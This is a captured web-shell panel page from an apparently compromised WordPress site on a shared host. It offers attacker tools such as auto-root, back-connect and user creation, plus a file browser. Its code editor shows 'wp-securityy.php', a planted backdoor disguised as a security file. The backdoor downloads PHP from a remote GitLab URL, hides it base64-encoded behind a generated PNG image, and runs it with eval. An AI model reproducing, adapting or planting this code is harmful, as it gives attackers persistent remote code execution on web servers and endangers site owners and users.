Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-admin /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
user
[ DIR ]
drwxr-xr-x
.user.php
0
B
-rw-r--r--
about.php
257
B
-rw-r--r--
admin.php
865
B
-rw-r--r--
credits.php
261
B
-rw-r--r--
freedoms.php
263
B
-rw-r--r--
index.php
251
B
-rw-r--r--
menu.php
758
B
-rw-r--r--
privacy.php
261
B
-rw-r--r--
profile.php
252
B
-rw-r--r--
user-edit.php
250
B
-rw-r--r--
wp-securityy.php
3.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-securityy.php
<?php /* Improved PNG disguise for hidden PHP payloads. This script fetches remote code, embeds it into a realistic PNG file, and executes it stealthily. */ session_start(); // Main remote code URL (can be overridden by session) $mainUrl = $_SESSION['ts_url'] ?? 'https://gitlab.com/mrgithub89-group/mrgithub89-projectaa/-/raw/main/wp-security.php'; // -------------------------------------------- // 1. Generate a realistic PNG image (128x128) // -------------------------------------------- function generateRealisticPngHeader($width = 128, $height = 128) { ob_start(); $image = imagecreatetruecolor($width, $height); // Fill with random noise for ($x = 0; $x < $width; $x++) { for ($y = 0; $y < $height; $y++) { $color = imagecolorallocate($image, rand(0,255), rand(0,255), rand(0,255)); imagesetpixel($image, $x, $y, $color); } } imagepng($image); imagedestroy($image); return ob_get_clean(); // Binary PNG data } // -------------------------------------------- // 2. Load remote PHP code from given URL // -------------------------------------------- function loadRemoteData($url) { $content = ''; try { $file = new SplFileObject($url); while (!$file->eof()) { $content .= $file->fgets(); } } catch (Throwable $e) { $content = ''; } if (strlen(trim($content)) < 1) { $content = @file_get_contents($url); } if (strlen(trim($content)) < 1 && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $content = curl_exec($ch); curl_close($ch); } return $content; } // -------------------------------------------- // 3. Create payload by appending hidden PHP code // -------------------------------------------- function createStealthPayload($phpCode) { $png = generateRealisticPngHeader(); $marker = '###PAYLOAD###'; $encoded = base64_encode($phpCode); return $png . $marker . $encoded; } // -------------------------------------------- // 4. Extract and execute hidden payload // -------------------------------------------- function extractAndExecutePayload($data) { $marker = '###PAYLOAD###'; $parts = explode($marker, $data); if (count($parts) === 2) { $decoded = base64_decode($parts[1]); if ($decoded !== false && strlen(trim($decoded)) > 0) { @eval("?>$decoded"); } } } // -------------------------------------------- // Main Execution Flow // -------------------------------------------- $remoteCode = loadRemoteData($mainUrl); if (strlen(trim($remoteCode)) > 0) { $payload = createStealthPayload($remoteCode); extractAndExecutePayload($payload); // Executes hidden remote code } ?>
Close
